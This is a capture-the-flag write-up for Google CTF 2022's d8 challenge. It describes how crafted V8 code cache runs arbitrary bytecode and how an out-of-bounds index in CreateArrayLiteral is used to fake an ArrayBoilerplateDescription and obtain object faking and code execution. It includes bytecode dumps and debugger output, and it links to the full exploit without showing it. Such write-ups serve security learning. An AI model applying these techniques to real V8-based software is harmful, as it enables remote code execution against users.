Google CTF 2022 d8: From V8 Bytecode to Code Execution
This weekend I have played Google CTF with r3kapig. On the first day I tried the OCR
challenge but failed to solve it, and on the second day I spent the whole day working on the d8
that I am more familiar with. Finally I managed to solve it at midnight as the second blood. This challenge is quite interesting so it is worth to do a write-up.
0x00 Overview
In this challenge, we need to exploit a runner.cc
that takes binary input and passes it to v8::ScriptCompiler::CachedData
, which is to be executed. After some investigation, we found that we can use such primitive to execute arbitrary V8 bytecode. It turns out that V8 bytecode execution has many out-of-bound primitives that can be exploited because they are deemed as trusted input by V8. The final solution utilizes an out-of-bound read in CreateArrayLiteral
to fetch a faked ArrayBoilerplateDescription
, leading to an object faking primitive and thus code execution with regular exploitation technique.
0x01 V8 Code Caching
More information about this can be found here and here. To make it simple, it is a technique that allows V8 to avoid having to parse a same script for many times. When a JavaScript script is compiled, a cache that stores the compilation result can be generated, and when such script is encountered again, such cache can be used instead of re-compiling the same script again.
Generating Code Cache
According to the documentation in the link above, we need to use v8::ScriptCompiler::kProduceCodeCache
or v8::ScriptCompiler::GetCodeCache
to generate cache for a script being compiled. However, non of these is found in the given V8 version. After checking test-api.cc
, we found that we need to use v8::ScriptCompiler::CreateCodeCache
to generate the code cache for a script that was just compiled and executed. Yes, it turns out the documentation makes the mistake. Note that we must call CreateCodeCache
after script->Run(context)
, otherwise some lazily compiled functions are not cached.
In addition, v8::V8::SetFlagsFromCommandLine
can be used to allow the script to use native syntaxes such as %DebugPrint
. This can make debugging much more convenient. Note that the %DebugPrint
is compiled into code cache in the V8 bytecode, so when such cache is executed in the runner.cc
, the %DebugPrint
output can still be shown.
Another thing to note is that when runner.cc
loads the cache, an empty script string is also provided. The cache loader would check if the hash inside the binary cache is identical to the hash of the script, if not the cache will be rejected. After some debugging, we found that the hash of empty script is 0
and the hash of binary cache is the 4 bytes at offset +8
. Therefore to allow the cache to be executed such field is set to 0
.
Also, the cache generated by debug/release version can not be shared among each other, otherwise the cache will be rejected. In debug version, a flag FLAG_verify_snapshot_checksum
is set to perform some additional checksum checking, to disable this, this flag is manually set to false
at function SerializedCodeData::SanityCheckWithoutSource
.
At this point we can generate the cache for our JavaScript code that can be run by runner.cc
. The full code about this is here. We can use ./gen exp.js --allow-natives-syntax --print-bytecode
to compile the JavaScript into cache and store the binary cache into ./blob.bin
. We use --print-bytecode
to see V8 bytecode being generated, and such bytecode can also be found in generated cache.
0x02 Exploiting V8 Bytecode
Initially we are thinking if the raw machine code generated by JIT is also stored into cache, if so we can directly execute the shellcode by modifying them in the cache. However, after some trials, it turns out that thing cannot be easy like this. Therefore, it seems that we should use V8 bytecode to achieve the exploit.
By arbitrarily modifying the bytecode, the V8 easily crashes. I have come up with some exploitation ideas but only the last one works for me finally.
- Use bytecode to leak the
hole
into JavaScript, which is an exploitation primitive that has been previously used. However, it seems that this primitive is already mitigated in current version according to my friend sakura, so I have not spent much time on it, although it can potentially work. - When V8 bytecode accesses the argument register, there is an index value byte in the instruction byte sequence. By modifying such byte, OOB can be caused. However, after further investigation, the OOB occurs on stack, and the data behind is not easily controllable. In addition, the argument array is not stored in compressed pointer form but 64-bit pointers, so it is hard to exploit by simply writing
Smi
numbers to stack. Therefore, this idea does not work. - We found that
CreateArrayLiteral
also has an index value that is used to access aFixedArray
inOldSpace
. The value being fetched is a pointer toArrayBoilerplateDescription
, which describes how array is initialized. By controlling the content after theFixedArray
, we can fake suchArrayBoilerplateDescription
instance, so we can also obtain an object faking primitive. After then the exploitation is regular.
CreateArrayLiteral
This is a bytecode that is used to create JavaScript array. Let’s write some test code to see how it works.
function foo()
{
const o = [[], 1.1, 0x123];
return o[0];
}
foo();
readline();
// ./d8 test.js --print-bytecode
Here is the bytecode generated for this foo
function:
79 00 00 04 CreateArrayLiteral [0], [0], #4
c4 Star0
0c LdaZero
2f fa 01 GetKeyedProperty r0, [1]
a9 Return
It turns out that an instruction CreateArrayLiteral [0], [0], #4
is generated for the array creation. The question is how does interpreter know what elements to put into the array? The answer lies at [0]
of CreateArrayLiteral
. Such value is used as index to access an FixedArray
, which is printed below the bytecode.
0x1b1f00253b31: [FixedArray] in OldSpace
- map: 0x1b1f00002239 <Map>
- length: 1
0: 0x1b1f00253b25 <ArrayBoilerplateDescription PACKED_ELEMENTS, 0x1b1f00253af9 <FixedArray[3]>>
The index 0
accesses an ArrayBoilerplateDescription
instance. This is an instance used to describe how the array elements are initialized. Let see what information it contains.
pwndbg> job 0x1b1f00253b25
0x1b1f00253b25: [ArrayBoilerplateDescription] in OldSpace
- map: 0x1b1f000033f5 <Map[12]>
- elements kind: PACKED_ELEMENTS
- constant elements: 0x1b1f00253af9 <FixedArray[3]>
pwndbg> job 0x1b1f00253af9
0x1b1f00253af9: [FixedArray] in OldSpace
- map: 0x1b1f00002239 <Map>
- length: 3
0: 0x1b1f00253b0d <ArrayBoilerplateDescription PACKED_SMI_ELEMENTS, 0x1b1f00002261 <FixedArray[0]>>
1: 0x1b1f00253b19 <HeapNumber 1.1>
2: 291
pwndbg> p/x 291
$1 = 0x123
The ArrayBoilerplateDescription
instance contains a constant elements
field which points to another FixedArray
. Such FixedArray
contains the elements to be initialized for the newly created array. One interesting point to note is that the first element is another ArrayBoilerplateDescription
pointer instead of a JSArray
pointer, and this makes sense: each time when we create an array, we want a new JSArray
instance to be created instead of using the reference to the old JSArray
.
An important question to ask is that if we can fake such ArrayBoilerplateDescription
instance used for CreateArrayLiteral
, can we have object faking primitive? After manually modifying pointers inside the constant elements
to an existing JavaScript object pointer, the answer turns out to be yes. Therefore, the next question is how to fake the ArrayBoilerplateDescription
via OOB read of CreateArrayLiteral
instruction.
Controlling Memory after FixedArray
Since the FixedArray
is in the OldSpace
, it is quite intuitive to try to create an Array
with double
elements and calls garbage collection to put it into OldSpace
, and to see if the array elements can locate at memory after the FixedArray
(e.i. the OOB read victim). However, it seems that the element content is too far away from the FixedArray
, so this approach does not work.
Then we found that the content inside constant elements
is very close to FixedArray
, but it is before instead of after the FixedArray
. However, if we create another function that also contains a CreateArrayLiteral
instruction, its constant elements
can reside after the target victim FixedArray
, as long as this function declaration is located after the victim function. In addition, if the array created contains only double
elements, its constant elements
is a FixedDoubleArray
, which means unboxed double
is stored in the memory, so we can fully control the memory content after the victim FixedArray
!
The specific OOB index is found by some debugging and trials. Initially we set the unboxed double
to A
s, and then we inspect the memory after the target victim FixedArray
in the gen.cc
process (debug version). Note that we cannot do so in runner.cc
because we cannot print the bytecode there. Nonetheless, fortunately the memory layout is very similar among them. With this we calculate an index value and set it as index used by instruction CreateArrayLiteral
, and then we can run the challenge
binary with the modified cache. If a crash occurs with address 0x????41414141
, the index is valid for OOB access.
Final Exploit
At this point the exploitation steps should be clear:
- Prepare a large
double
array, and the low 32 bits of its element address are fixed (V8 pointer compression). Such array is used to prepare the faked instances such asArrayBoilerplateDescription
,FixedArray
,Uint32Array
, etc. - Spray the low 32 bits of the address of the elements of the large array as
FixedDoubleArray
after theFixedArray
used as OOB read victim. At the large array, theArrayBoilerplateDescription
should be faked (Note that in pointer compression mode low 32 bits of pointers to built-in instances such asMap
are fixed). - Call the victim function, whose
CreateArrayLiteral
instruction should be modified beforehand to cause the OOB read, and we return the element as the faked object. - As long as we have the faked object, the exploitation is very regular, which I will not discuss here.
The full exploit is here. We firstly need to compile this exploit to a cache binary, and then use the Python script to locate and modify the CreateArrayLiteral
instruction, and then use the modified cache as the final exploit to be used for the challenge
binary.